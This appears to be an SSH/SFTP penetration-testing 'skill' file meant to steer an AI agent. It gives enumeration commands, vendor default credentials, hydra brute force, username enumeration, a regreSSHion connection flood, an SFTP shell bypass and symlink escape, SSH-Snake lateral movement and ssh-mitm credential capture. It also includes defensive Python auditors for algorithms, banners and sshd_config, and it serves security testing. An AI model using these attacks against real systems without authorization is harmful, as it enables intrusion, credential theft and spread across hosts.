Hacktricks-skills ssh-pentesting
SSH/SFTP penetration testing and security assessment. Use this skill whenever the user needs to enumerate SSH services, test for vulnerabilities, check for weak configurations, attempt credential attacks, or assess SSH server security. Trigger on mentions of SSH, port 22, SFTP, remote access, SSH brute force, SSH enumeration, SSH vulnerabilities, or any SSH-related security testing tasks.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/network-services-pentesting/pentesting-ssh/SKILL.MD
SSH/SFTP Penetration Testing
A comprehensive skill for SSH security assessment, enumeration, and vulnerability testing.
Quick Start
# Basic enumeration
./scripts/ssh-enumerate.sh <target-ip>
# Full audit with ssh-audit
./scripts/ssh-audit-wrapper.sh <target-ip>
# Check for default credentials
./scripts/check-default-creds.sh <target-ip>
# Scan for known vulnerabilities
./scripts/ssh-vuln-check.sh <target-ip>
Enumeration
Banner Grabbing
Get initial information about the SSH server:
nc -vn <IP> 22
Automated Enumeration
Use the bundled enumeration script:
./scripts/ssh-enumerate.sh <target-ip>
This runs:
- Banner grabbing
- Nmap default scripts
- Version detection
- Supported algorithms enumeration
- Host key retrieval
- Authentication methods check
SSH Audit
For comprehensive configuration auditing:
./scripts/ssh-audit-wrapper.sh <target-ip>
This uses ssh-audit to:
- Analyze SSH client/server configuration
- Detect weak/legacy algorithms
- Identify CVEs and security issues
- Provide hardening recommendations
Nmap Scripts
# Default scripts
nmap -p22 <ip> -sC
# Version detection
nmap -p22 <ip> -sV
# Supported algorithms
nmap -p22 <ip> --script ssh2-enum-algos
# Host keys (check for weak keys)
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full
# Authentication methods
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root"
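The ssh2-enum-algos output above is only useful once each offered algorithm is classified. The following is an added example (not part of the hacktricks-skills repository) that parses nmap's ssh2-enum-algos text and flags legacy key-exchange, host-key, cipher and MAC choices along the lines ssh-audit reports. The sample output is constructed for the example, and the rule list is this example's own selection, not ssh-audit's database:

```python
import re

# Output in the shape `nmap -p22 <ip> --script ssh2-enum-algos` prints, constructed
# for this example (not captured from a real host); the algorithm names are real
# SSH identifiers and the mix is deliberately legacy-heavy.
SAMPLE_NMAP = """\
| ssh2-enum-algos:
|   kex_algorithms: (4)
|       curve25519-sha256
|       diffie-hellman-group14-sha1
|       diffie-hellman-group1-sha1
|       ecdh-sha2-nistp256
|   server_host_key_algorithms: (3)
|       ssh-ed25519
|       ssh-rsa
|       ssh-dss
|   encryption_algorithms: (4)
|       chacha20-poly1305@openssh.com
|       aes128-ctr
|       aes128-cbc
|       3des-cbc
|   mac_algorithms: (4)
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha1
|       hmac-md5
|       umac-64@openssh.com
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com
"""

# (regex, severity, reason) per negotiation category; the first matching rule wins.
# "fail" = broken or deprecated, "warn" = the kind of thing ssh-audit reports as a warning.
RULES = {
    "kex": [
        (r"group1-sha1$", "fail", "1024-bit DH group"),
        (r"-sha1$", "fail", "SHA-1 based key exchange"),
        (r"^ecdh-sha2-nistp", "warn", "NIST curve"),
    ],
    "server_host_key": [
        (r"^ssh-dss$", "fail", "DSA, 1024-bit keys only"),
        (r"^ssh-rsa$", "fail", "RSA with SHA-1 signatures (off by default since OpenSSH 8.8)"),
        (r"^ecdsa-sha2-nistp", "warn", "NIST curve"),
    ],
    "encryption": [
        (r"-cbc$", "fail", "CBC mode"),
        (r"^(arcfour|3des|blowfish|cast128|des)", "fail", "legacy cipher"),
    ],
    "mac": [
        (r"md5", "fail", "MD5"),
        (r"ripemd", "fail", "RIPEMD-160"),
        (r"^umac-64", "warn", "64-bit tag"),
        (r"sha1", "warn", "SHA-1 HMAC"),
    ],
}


def parse_enum_algos(output):
    """Turn nmap's ssh2-enum-algos text into {category: [algorithm, ...]}."""
    algos, current = {}, None
    for raw in output.splitlines():
        line = raw.lstrip("|_ ").strip()          # drop nmap's "|" / "|_" gutter
        header = re.match(r"(\w+)_algorithms:", line)
        if header:
            current = header.group(1)             # kex, server_host_key, encryption, mac, compression
            algos[current] = []
        elif current and line:
            algos[current].append(line)
    return algos


def audit_algorithms(algos):
    """Return [(category, algorithm, severity, reason)] for every flagged algorithm."""
    findings = []
    for category, names in algos.items():
        for name in names:
            for pattern, severity, reason in RULES.get(category, []):
                if re.search(pattern, name):
                    findings.append((category, name, severity, reason))
                    break
    return findings


def audit_nmap_output(output):
    """Convenience wrapper: raw nmap text in, findings out."""
    return audit_algorithms(parse_enum_algos(output))


if __name__ == "__main__":
    for category, name, severity, reason in audit_nmap_output(SAMPLE_NMAP):
        print(f"[{severity.upper()}] {category}: {name} ({reason})")
```

Feed it real output with `nmap -p22 <ip> --script ssh2-enum-algos | python3 audit.py` after replacing SAMPLE_NMAP with `sys.stdin.read()`; a server that only offers curve25519/ed25519/chacha20/ETM MACs produces no findings.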
Public Key Retrieval
ssh-keyscan -t rsa,ecdsa,ed25519 <IP> -p <PORT>
Credential Testing
Default Credentials
Check against known default credentials:
./scripts/check-default-creds.sh <target-ip>
Common default credentials by vendor:
| Vendor | Usernames | Passwords |
|---|---|---|
| APC | apc, device | apc |
| Cisco | admin, cisco, root | cisco, Cisco, admin, password |
| Citrix | root, nsroot, admin | C1trix321, nsroot, rootadmin |
| Dell | root, admin, user1 | calvin, 123456, password |
| HP/3Com | admin, root, vcx | admin, password, hpinvent |
| Huawei | admin, root | 123456, admin, Admin123 |
| Juniper | netscreen | netscreen |
| NetApp | admin | netapp123 |
| Oracle | root, oracle, ilom-admin | changeme, ilom-admin, oracle |
| VMware | vi-admin, root, vmware | vmware, vmw@re, default |
Brute Force
Hydra (requires username):
hydra -v -V -l <username> -P <password-list> -t 1 <IP> ssh
Common password lists:
- https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt
- https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt
Username Enumeration
OpenSSH up to 7.7 (CVE-2018-15473) reacts differently to a malformed authentication request for valid and invalid usernames, and older builds also leak the difference through response timing; Metasploit's module drives both checks:
# Metasploit module
msf> use scanner/ssh/ssh_enumusers
Private Key Testing
Test known private keys:
# Nmap script (needs --script-args with the username and the key list)
nmap --script ssh-publickey-acceptance <ip>
# Metasploit
msf> use scanner/ssh/ssh_identify_pubkeys
# Python tool (supports legacy algorithms)
ssh-keybrute.py <target> <key-file>
Known bad keys: https://github.com/rapid7/ssh-badkeys/tree/master/authorized
Weak SSH Keys (Debian PRNG)
Check for Debian predictable PRNG weak keys:
# Download and test against known weak keys
git clone https://github.com/g0tmi1k/debian-ssh
cd debian-ssh
./test.sh <target-ip>
Vulnerability Assessment
Known Vulnerabilities
Check for recent critical vulnerabilities:
./scripts/ssh-vuln-check.sh <target-ip>
This checks for:
- CVE-2024-6387 (regreSSHion) - OpenSSH 8.5p1–9.7p1 signal-handler race
- CVE-2024-3094 (xz backdoor) - XZ Utils 5.6.0/5.6.1 supply-chain attack
- CVE-2025-32433 - Erlang/OTP authentication bypass
- CVE-2018-10933 - libssh unauthenticated success
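Three of the four issues above can at least be triaged from the server identification string, so here is an added example (not the skill's own ssh-vuln-check.sh) that grabs the banner and maps it onto the version ranges the list gives: OpenSSH 8.5p1 to 9.7p1 for regreSSHion, libssh 0.6 up to the 0.7.6 / 0.8.4 fixes for CVE-2018-10933, and any Erlang banner as a lead for CVE-2025-32433. The xz backdoor is not visible in the banner and still needs the on-host checks below. The sample banners are constructed, and the parser is this example's own, not a library API:

```python
import re
import socket

# Identification strings constructed for this example (not captured from real hosts).
SAMPLE_BANNERS = [
    "SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13",
    "SSH-2.0-OpenSSH_9.8p1",
    "SSH-2.0-libssh_0.8.1",
    "SSH-2.0-Erlang/5.2.9",
    "SSH-1.99-OpenSSH_3.9p1",
]

BANNER_RE = re.compile(r"^SSH-(?P<proto>\d\.\d+)-(?P<software>\S+)(?:\s+(?P<comment>.*))?$")
SOFTWARE_RE = re.compile(r"(?P<name>[A-Za-z]+)[_/]?(?P<version>\d[\w.+-]*)?")


def grab_banner(host, port=22, timeout=5):
    """Read the server identification string (RFC 4253 section 4.2); no key exchange is started."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        data = sock.recv(255).decode("ascii", errors="replace")
    for line in data.splitlines():            # servers may send text lines before the SSH- line
        if line.startswith("SSH-"):
            return line.strip()
    return data.strip()


def parse_banner(banner):
    """'SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u3' -> proto, software, version, comment."""
    m = BANNER_RE.match(banner.strip())
    if not m:
        return None
    s = SOFTWARE_RE.match(m["software"])
    return {
        "proto": m["proto"],
        "software": s["name"] if s else m["software"],
        "version": (s["version"] or "") if s else "",
        "comment": m["comment"] or "",
    }


def version_tuple(version):
    """'9.2p1' -> (9, 2, 1); '0.8.1' -> (0, 8, 1); missing fields become 0."""
    nums = [int(n) for n in re.findall(r"\d+", version)]
    return tuple((nums + [0, 0, 0])[:3])


def check_banner(banner):
    """Return [(id, note)] for what the banner alone can tell you."""
    info = parse_banner(banner)
    if info is None:
        return [("banner", f"not an SSH identification string: {banner!r}")]
    findings = []
    if info["proto"].startswith("1."):                 # "1.5" or "1.99": SSH-1 still offered
        findings.append(("SSH-1", "server still offers protocol version 1"))
    name = info["software"]
    v = version_tuple(info["version"]) if info["version"] else None
    if name == "OpenSSH" and v:
        if (8, 5, 0) <= v < (9, 8, 0) or v < (4, 4, 0):
            note = "version in the regreSSHion range (pre-4.4p1 carries the original CVE-2006-5051 bug)"
            if info["comment"]:
                # Distros backport fixes without bumping the upstream version string.
                note += f"; distro build '{info['comment']}' may be patched, confirm from the package changelog"
            findings.append(("CVE-2024-6387", note))
    elif name == "libssh" and v:
        if (0, 6, 0) <= v < (0, 7, 6) or (0, 8, 0) <= v < (0, 8, 4):
            findings.append(("CVE-2018-10933", "libssh accepts a client-sent USERAUTH_SUCCESS; fixed in 0.7.6 / 0.8.4"))
    elif name == "Erlang":
        # The banner carries the ssh application version, not the OTP release, so this is a lead, not proof.
        findings.append(("CVE-2025-32433", "Erlang/OTP ssh daemon; test whether channel messages are accepted before auth"))
    return findings


if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(banner, "->", check_banner(banner) or "nothing from the banner")
```

Against a live host call `check_banner(grab_banner("<target-ip>"))`. Treat every hit as a lead to confirm on the box or with an actual probe: a distro comment such as `Ubuntu-3ubuntu13.x` usually means the vulnerable-looking upstream version was patched in place.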
CVE-2024-6387 (regreSSHion)
Affects OpenSSH 8.5p1 through 9.7p1 on glibc-based Linux (releases before 4.4p1 carry the original bug, CVE-2006-5051). When LoginGraceTime expires, sshd's SIGALRM handler calls async-signal-unsafe functions such as syslog(), so an unauthenticated client that times its connections right can corrupt the glibc heap and reach remote code execution as root.
Detection:
nc -vn <target> 22                                   # remote: version string in the banner
nmap -p22 -sV <target>
ssh -V                                               # on the host: installed OpenSSH version
dpkg -l openssh-server 2>/dev/null || rpm -q openssh-server   # package version, to check for a backported fix
Lab testing (hammers the LoginGraceTime signal-handler path; a real exploit needs many hours of attempts and a matching glibc/ASLR layout, so treat this as a stress test, not a check):
parallel -j200 "timeout 3 ssh -o PreferredAuthentications=none -o ConnectTimeout=2 attacker@${TARGET}" ::: {1..4000}
CVE-2024-3094 (xz Backdoor)
XZ Utils 5.6.0 and 5.6.1 ship a trojanized liblzma. On distributions whose sshd links libsystemd (and through it liblzma), the backdoor hooks RSA_public_decrypt and runs commands carried in a key-exchange packet signed with the attacker's private key, before any authentication.
Detection:
xz --version
rpm -qi xz        # or: dpkg -l xz-utils
ldd /usr/sbin/sshd | grep -E "systemd|lzma"
Erlang/OTP Authentication Bypass (CVE-2025-32433)
Affects OTP < 27.3.3, 26.2.5.11, 25.3.2.20. Allows unauthenticated RCE.
Detection: a vulnerable server handles SSH connection-protocol messages (message numbers 80 and above, e.g. SSH_MSG_CHANNEL_OPEN = 90 and SSH_MSG_CHANNEL_REQUEST = 98) before user authentication has completed; send one straight after key exchange and see whether it is processed rather than rejected.
Mitigation: Upgrade to 27.3.3 / 26.2.5.11 / 25.3.2.20 or newer.
Configuration Assessment
Root Login
Check if root login is permitted (security risk):
# In sshd_config, should be:
PermitRootLogin no
Authentication Methods
Check for weak authentication methods:
ssh -v <target>
# Look for: Authentications that can continue: publickey,password,keyboard-interactive
Force password authentication if needed:
ssh -v <target> -o PreferredAuthentications=password
SFTP Security
Command Execution Bypass:
Users meant to have SFTP-only access can still run commands when sshd does not force the sftp subsystem for them (no ForceCommand in their Match block):
ssh user@target /bin/bash
Secure SFTP Configuration:
Match User sftpuser
    ChrootDirectory %h
    ForceCommand internal-sftp
    AllowTcpForwarding no
    PermitTunnel no
    X11Forwarding no
    PermitTTY no
The ChrootDirectory itself must be owned by root and not writable by any other user, otherwise sshd refuses the login; give the user a writable subdirectory inside it.
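The checks in this section (PermitRootLogin, password authentication, a Match block that chroots a user without forcing internal-sftp) are easy to get wrong by eye because sshd keeps the first occurrence of a keyword and scopes Match-block options separately. As an added example, not part of the skill's scripts, here is a small sshd_config parser that applies those rules and audits a weak fragment beside the hardened one from above. Both config fragments are constructed for the example:

```python
import re

# Two sshd_config fragments constructed for this example (not from any real host).
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes
Subsystem sftp /usr/lib/openssh/sftp-server

Match User sftpuser
    ChrootDirectory %h
    # ForceCommand is missing: "ssh sftpuser@host /bin/bash" can still request a command
"""

HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
Subsystem sftp internal-sftp

Match User sftpuser
    ChrootDirectory %h
    ForceCommand internal-sftp
    AllowTcpForwarding no
    PermitTunnel no
    X11Forwarding no
    PermitTTY no
"""

# Options an SFTP-only Match block should pin to "no".
SFTP_LOCKDOWN = ("allowtcpforwarding", "permittunnel", "x11forwarding", "permittty")


def parse_sshd_config(text):
    """Return (global_options, [(match_criteria, options), ...]).

    Keywords are case-insensitive, so keys are lowercased; the first occurrence
    of a keyword wins, as in sshd itself. Everything after a Match line belongs
    to that block until the next Match line."""
    global_opts, matches, current = {}, [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # strip comments and whitespace
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # "Key value" or "Key=value"
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            current = {}
            matches.append((value, current))
            continue
        target = global_opts if current is None else current
        target.setdefault(key, value)
    return global_opts, matches


def audit_sshd_config(text):
    """Return human-readable findings for the settings discussed on this page."""
    g, matches = parse_sshd_config(text)
    findings = []
    # OpenSSH defaults: PermitRootLogin prohibit-password (since 7.0), PasswordAuthentication yes.
    if g.get("permitrootlogin", "prohibit-password").lower() == "yes":
        findings.append("PermitRootLogin yes: root can log in with a password")
    if g.get("passwordauthentication", "yes").lower() == "yes":
        findings.append("PasswordAuthentication yes: password brute force is possible")
    if g.get("permitemptypasswords", "no").lower() == "yes":
        findings.append("PermitEmptyPasswords yes")
    if "1" in g.get("protocol", "2").split(","):
        findings.append("Protocol 1 enabled")
    for criteria, opts in matches:
        who = f"Match {criteria}"
        chrooted = "chrootdirectory" in opts
        force = opts.get("forcecommand", "").lower()
        if chrooted and force != "internal-sftp":
            findings.append(f"{who}: ChrootDirectory without ForceCommand internal-sftp; "
                            "'ssh <user>@<host> /bin/bash' can still request a command")
        if chrooted or force == "internal-sftp":
            missing = [k for k in SFTP_LOCKDOWN if opts.get(k, "").lower() != "no"]
            if missing:
                findings.append(f"{who}: forwarding/tty not disabled ({', '.join(missing)})")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {label} ==")
        for f in audit_sshd_config(cfg) or ["no findings"]:
            print(" -", f)
```

On a real host run `audit_sshd_config(open("/etc/ssh/sshd_config").read())`; Include directives are not followed, so audit included files separately.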
SFTP Symlink Attack:
If you have write access inside the SFTP root, create a symlink that points outside it:
sftp> symlink / froot
Inside a chroot the link resolves relative to the jail, so the payoff comes when another service that reads the same directory from outside (a web server that follows symlinks, a backup job) serves the linked content.
SFTP Tunneling:
ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip>   # sudo only if <local_port> is below 1024
This is plain SSH port forwarding over the SFTP user's session; AllowTcpForwarding no in the Match block above blocks it.
Lateral Movement
SSH-Snake
Automated lateral movement using discovered SSH keys:
git clone https://github.com/MegaManSec/SSH-Snake
cd SSH-Snake
bash Snake.sh   # a bash script: run it on the host you already control, it spreads from there rather than taking a remote target
SSH-Snake:
- Finds SSH private keys on current system
- Identifies hosts where keys may work
- Attempts SSH connections
- Recursively repeats on new systems
Kerberos/GSSAPI Authentication
If target supports GSSAPI (e.g., Windows OpenSSH on domain):
# Sync time with KDC
sudo ntpdate <dc.fqdn>
# Generate krb5.conf
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
sudo cp krb5.conf /etc/krb5.conf
# Get TGT
kinit <user>
klist
# SSH with GSSAPI
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>
Or use crackmapexec:
crackmapexec ssh --kerberos <target>
SSH MitM
Capture credentials via man-in-the-middle:
git clone https://github.com/jtesta/ssh-mitm
cd ssh-mitm
sudo ./install.sh   # a patched OpenSSH build, not a Python script; start it afterwards with the repository's run script
Combine with ARP/DNS spoofing for traffic redirection. The victim's client sees an unknown or changed host key, so this only works against clients with no pinned known_hosts entry or users who click through the mismatch warning (StrictHostKeyChecking).
Fuzzing
- https://packetstormsecurity.com/files/download/71252/sshfuzz.txt
- Metasploit:
auxiliary/fuzzers/ssh/ssh_version_2
Configuration Files to Check
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/etc/ssh/ssh_known_hosts
~/.ssh/config
~/.ssh/authorized_keys
~/.ssh/known_hosts
~/.ssh/id_rsa, ~/.ssh/id_ecdsa, ~/.ssh/id_ed25519